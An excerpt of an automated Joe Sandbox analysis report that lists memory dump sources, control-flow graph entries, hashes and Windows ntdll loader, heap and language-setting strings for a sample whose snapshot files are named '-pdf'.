                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                • Opcode ID: 8bed61b20fc1319d828832d96cd2df9170cc440e4b5382bb1eccda39d0ccd4f6
                                                                                                                                                • Instruction ID: 3928be96b0bb21ea01fbc6d57ea2e9352dbda775cb9ee4e874704f653b680fb1
                                                                                                                                                • Opcode Fuzzy Hash: 8bed61b20fc1319d828832d96cd2df9170cc440e4b5382bb1eccda39d0ccd4f6
                                                                                                                                                • Instruction Fuzzy Hash: D9018F35700908EBDF309F55EC85A9B3A26EB88765F004237FA04B61D1C7798892DEAD

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:0%
                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                Signature Coverage:34.6%
                                                                                                                                                Total number of Nodes:81
                                                                                                                                                Total number of Limit Nodes:0

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 0 32662b90-32662b9c LdrInitializeThunk
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                • Opcode ID: 2ca71c64759a3d9ef8eaf4392cb9f6a57c4b027f31d191a8a78bab46da058d1b
                                                                                                                                                • Instruction ID: b9789a393ad08db91b67915544ffe869e31aa902448973aa290100b972537bab
                                                                                                                                                • Opcode Fuzzy Hash: 2ca71c64759a3d9ef8eaf4392cb9f6a57c4b027f31d191a8a78bab46da058d1b
                                                                                                                                                • Instruction Fuzzy Hash: 3D90023120118802D610655CA70475A10054FD0301F55D816A4524618DD6A58CD57121

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 2 326634e0-326634ec LdrInitializeThunk
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                • Opcode ID: 42f739ad3bda182d86ec940ffd7a966d73d86159c14b0058d8a76d36411e8d4e
                                                                                                                                                • Instruction ID: 23699477870e226f3634b27660a2c53ec2164c8509f947cbd1cee7a9225704a9
                                                                                                                                                • Opcode Fuzzy Hash: 42f739ad3bda182d86ec940ffd7a966d73d86159c14b0058d8a76d36411e8d4e
                                                                                                                                                • Instruction Fuzzy Hash: 1090023160520402D600655C671471620054FD0201F61D816A0524528DD7A58D9575A2

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1 32662d10-32662d1c LdrInitializeThunk
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                • Opcode ID: b866397ef8a9d5f1da5ad226d7825367ed8284a84471ae8b0ed2fc9bad0f1f1f
                                                                                                                                                • Instruction ID: 011e5e76266100c3243b8b4494496d718243716ef31ad560027d6a590ac7cd52
                                                                                                                                                • Opcode Fuzzy Hash: b866397ef8a9d5f1da5ad226d7825367ed8284a84471ae8b0ed2fc9bad0f1f1f
                                                                                                                                                • Instruction Fuzzy Hash: 9390023120110413D611655C670471710094FD0241F91D817A0524518DE6668D96B121

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: $ $0
                                                                                                                                                • API String ID: 3446177414-3352262554
                                                                                                                                                • Opcode ID: 78b49f9190812c6759547c988ea89e5065f4c5281dd646603b331d7cfc8bd3d5
                                                                                                                                                • Instruction ID: 98b14c1700befd132894c8ae6b3a0a904e37744fbb9be4b3e42d9a85caa7a3b2
                                                                                                                                                • Opcode Fuzzy Hash: 78b49f9190812c6759547c988ea89e5065f4c5281dd646603b331d7cfc8bd3d5
                                                                                                                                                • Instruction Fuzzy Hash: 913225B16093818FE314DF68C484BABBBE5FF88348F44492EF59987250DB74E949CB52

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.d2
                                                                                                                                                • API String ID: 0-2549624499
                                                                                                                                                • Opcode ID: 6f2b9b7e1eed164046ef7ab9692115abfb29a23a818ba2be435110171a47f6ba
                                                                                                                                                • Instruction ID: bbe61182e396b72ef63dc164967950d64cf0653d21c566267873c8fa9e8eefdd
                                                                                                                                                • Opcode Fuzzy Hash: 6f2b9b7e1eed164046ef7ab9692115abfb29a23a818ba2be435110171a47f6ba
                                                                                                                                                • Instruction Fuzzy Hash: 3EB18AB69083519FD715CF28D880B5FB7E8AF88748F41492EF98897241DB71E908CB97

                                                                                                                                                Control-flow Graph (legend: Executed, Not Executed)
                                                                                                                                                APIs
                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 3261651C
                                                                                                                                                  • Part of subcall function 32616565: RtlDebugPrintTimes.NTDLL ref: 32616614
                                                                                                                                                  • Part of subcall function 32616565: RtlDebugPrintTimes.NTDLL ref: 3261665F
                                                                                                                                                Strings
                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3267977C
                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 326797A0, 326797C9
                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32679790
                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 326797B9
                                                                                                                                                • apphelp.dll, xrefs: 32616446
                                                                                                                                                • LdrpInitShimEngine, xrefs: 32679783, 32679796, 326797BF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                • API String ID: 3446177414-204845295
                                                                                                                                                • Opcode ID: 84d69de10524695e983b74decb7dd2106e1f3d1db03a20df0511fa6880556c5d
                                                                                                                                                • Instruction ID: 70915a11cecc0aced0426850ca1dc2bf8154f7b6008975e0f00772ccbdb8ab4e
                                                                                                                                                • Opcode Fuzzy Hash: 84d69de10524695e983b74decb7dd2106e1f3d1db03a20df0511fa6880556c5d
                                                                                                                                                • Instruction Fuzzy Hash: 4551E17524A3419FE319CF24D880F9B77E8FF88354F404919F685A72A0EA70F945CB92

                                                                                                                                                Control-flow Graph (legend: Executed, Not Executed)
                                                                                                                                                Strings
                                                                                                                                                • h.d2, xrefs: 3267A5D2
                                                                                                                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3261D0E6
                                                                                                                                                • @, xrefs: 3261D2B3
                                                                                                                                                • @, xrefs: 3261D24F
                                                                                                                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 3261D136
                                                                                                                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3261D06F
                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3261D263
                                                                                                                                                • @, xrefs: 3261D09D
                                                                                                                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3261D202
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.d2
                                                                                                                                                • API String ID: 0-1582831309
                                                                                                                                                • Opcode ID: ccd59e668daea1c722d72dd7e2c90a6c22a8b5796407dd57562c4a3f4e553ec1
                                                                                                                                                • Instruction ID: b3996626813d51af28e5e62a30210f3128e881734b8e194814cad415cac005f4
                                                                                                                                                • Opcode Fuzzy Hash: ccd59e668daea1c722d72dd7e2c90a6c22a8b5796407dd57562c4a3f4e553ec1
                                                                                                                                                • Instruction Fuzzy Hash: C3A151B15083459FE321CF14D980B9BB7E8BF88759F00492EFA9896241DB75E908CF93
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$\SysWOW64$minkernel\ntdll\ldrutil.c$xt_2
                                                                                                                                                • API String ID: 0-889383425
                                                                                                                                                • Opcode ID: 7ea008deb725093b13d332d6e2059742ff001e6967e89944dc8907db14d79f1a
                                                                                                                                                • Instruction ID: d3ea9a85fbe3f62f8b401f2a6879fa6e03f5de05b9dc1f48d4ae0b8cd9d770b3
                                                                                                                                                • Opcode Fuzzy Hash: 7ea008deb725093b13d332d6e2059742ff001e6967e89944dc8907db14d79f1a
                                                                                                                                                • Instruction Fuzzy Hash: 48C27CB4A017298FDB29CF15CC907AAB7B5BF48348F0041EDEA49AB251DB709E81CF55
                                                                                                                                                APIs
                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 3264D879
                                                                                                                                                  • Part of subcall function 32624779: RtlDebugPrintTimes.NTDLL ref: 32624817
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                • API String ID: 3446177414-1975516107
                                                                                                                                                • Opcode ID: 357672e9efce1400a077fcf79fa205dd8e6893edb21d0dad1abbc71858b4685a
                                                                                                                                                • Instruction ID: d41874c00e6b38399bc83a2dca875c2456a44fb8017ae3ed26911d70f922749f
                                                                                                                                                • Opcode Fuzzy Hash: 357672e9efce1400a077fcf79fa205dd8e6893edb21d0dad1abbc71858b4685a
                                                                                                                                                • Instruction Fuzzy Hash: 4D511175E05345DFEB09CFA4C480B9EBBB1BF48758F618059D8416B282DFB4A986CF81
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                • API String ID: 3446177414-3224558752
                                                                                                                                                • Opcode ID: d3fda778cdda06541b8087535561c24cc9485099bfa38e9d661dfa32da4f0e53
                                                                                                                                                • Instruction ID: 432591651eb8cacf0859e8788e462a88585a983389b5382b5c14f1917c0e6019
                                                                                                                                                • Opcode Fuzzy Hash: d3fda778cdda06541b8087535561c24cc9485099bfa38e9d661dfa32da4f0e53
                                                                                                                                                • Instruction Fuzzy Hash: DF415735A00700EFE715CF24C484B5AB7B8FF45364F1489AAE84597782CF79A9C1CB96
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                • API String ID: 0-2224505338
                                                                                                                                                • Opcode ID: 37d40e4dab099b8de7dc1c33ac63f1eb8ce84fb9aaa47ff1308a161cd9c12066
                                                                                                                                                • Instruction ID: e5428df9e6322250855bb8cdb692feaff06d0e8e10257337eee6a5ecda99d8b4
                                                                                                                                                • Opcode Fuzzy Hash: 37d40e4dab099b8de7dc1c33ac63f1eb8ce84fb9aaa47ff1308a161cd9c12066
                                                                                                                                                • Instruction Fuzzy Hash: 7D510436201294EFE715EF64D844F5A73BCEF097B4F2488AAF5019B219CA72FA40CE15
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                • API String ID: 0-523794902
                                                                                                                                                • Opcode ID: ed5f12b0fe8003adb1a3a2370054baae6c4297336179e466dc7d6a64c4bf368a
                                                                                                                                                • Instruction ID: 7c2538043b41009435cd0a83e45209113314931d3f471e05f276ee166a442def
                                                                                                                                                • Opcode Fuzzy Hash: ed5f12b0fe8003adb1a3a2370054baae6c4297336179e466dc7d6a64c4bf368a
                                                                                                                                                • Instruction Fuzzy Hash: 7E42DE75205781DFD309CF28C884B6ABBE9FF88348F04496DE8858B252DB74F945CB92
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.d2
                                                                                                                                                • API String ID: 0-1330769605
                                                                                                                                                • Opcode ID: cde70234dbac3e9d18b5bdfbc3ba28956fd18c5f79e890be570d7500ebf28875
                                                                                                                                                • Instruction ID: 2a34bf735f219720a8bea52c5e312a24e79ee6e491f03c83dff269a29105ae3f
                                                                                                                                                • Opcode Fuzzy Hash: cde70234dbac3e9d18b5bdfbc3ba28956fd18c5f79e890be570d7500ebf28875
                                                                                                                                                • Instruction Fuzzy Hash: A4F13BB6D01219EFDB16CF98C990ADEBBB8EF58754F50406AE901E7210EE749E01CB94
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                • API String ID: 0-122214566
                                                                                                                                                • Opcode ID: 1959f34a9fd2539fc434ca1932b3e7873ab32626f85a8e7d61bf7c43dc3dad3b
                                                                                                                                                • Instruction ID: b2930c967256a54acc3efa342a3360573123ac2f741505ea495d2afdd36e9185
                                                                                                                                                • Opcode Fuzzy Hash: 1959f34a9fd2539fc434ca1932b3e7873ab32626f85a8e7d61bf7c43dc3dad3b
                                                                                                                                                • Instruction Fuzzy Hash: E0C13975A02319ABEB1A8B64C8D0BBE77A1BF45744F54416DEE01EB2A0DFB4CD44C392
                                                                                                                                                Strings
                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 32691F8A
                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 32691FC9
                                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 32691FA9
                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 32691F82
                                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 32691F6A, 32691FA4, 32691FC4
                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 32691F6F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                • API String ID: 0-861424205
                                                                                                                                                • Opcode ID: a63822ebe1d0c27eb6b5601b2a69d266a29f928bd138d93ef27b7cb134c1881e
                                                                                                                                                • Instruction ID: 93b916e8dfc778464f8fc4804db31731252b2745c0422139976e837be0f78fd2
                                                                                                                                                • Opcode Fuzzy Hash: a63822ebe1d0c27eb6b5601b2a69d266a29f928bd138d93ef27b7cb134c1881e
                                                                                                                                                • Instruction Fuzzy Hash: B031D6B6E00218BBF7158A969C94F9B77A8DF44BA4F2140E9B90577241DB70EE00CBE5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                                • Opcode ID: c7b7df45dd73832cf339e217e95464cf905a2eae09eae7f23d7d78c912927309
                                                                                                                                                • Instruction ID: 4a9c67f09232bc7c5c238cc5518b348886f82f7201af1ff6be533b0219c075e9
                                                                                                                                                • Opcode Fuzzy Hash: c7b7df45dd73832cf339e217e95464cf905a2eae09eae7f23d7d78c912927309
                                                                                                                                                • Instruction Fuzzy Hash: E0F1CC74A01A05DFEB0ACF68C890B6AB7F5FF84344F1081A9E9459B391DB34E985CF91
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 326980F3
                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 326980E9
                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 326980E2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                • API String ID: 3446177414-1783798831
                                                                                                                                                • Opcode ID: 517af15d34580861c66560f33a605bde623ce635184f39044ad157c2407a8793
                                                                                                                                                • Instruction ID: 42cf7dee9f132e4320f26041b5d692e9338392a164dc13ba6ecf79031a859989
                                                                                                                                                • Opcode Fuzzy Hash: 517af15d34580861c66560f33a605bde623ce635184f39044ad157c2407a8793
                                                                                                                                                • Instruction Fuzzy Hash: 314123B5542300ABD325EF24DC40B8B77E8FF88750F20592AB949E3251EF70E945CB96
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 326A4508
                                                                                                                                                • LdrpCheckRedirection, xrefs: 326A450F
                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 326A4519
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
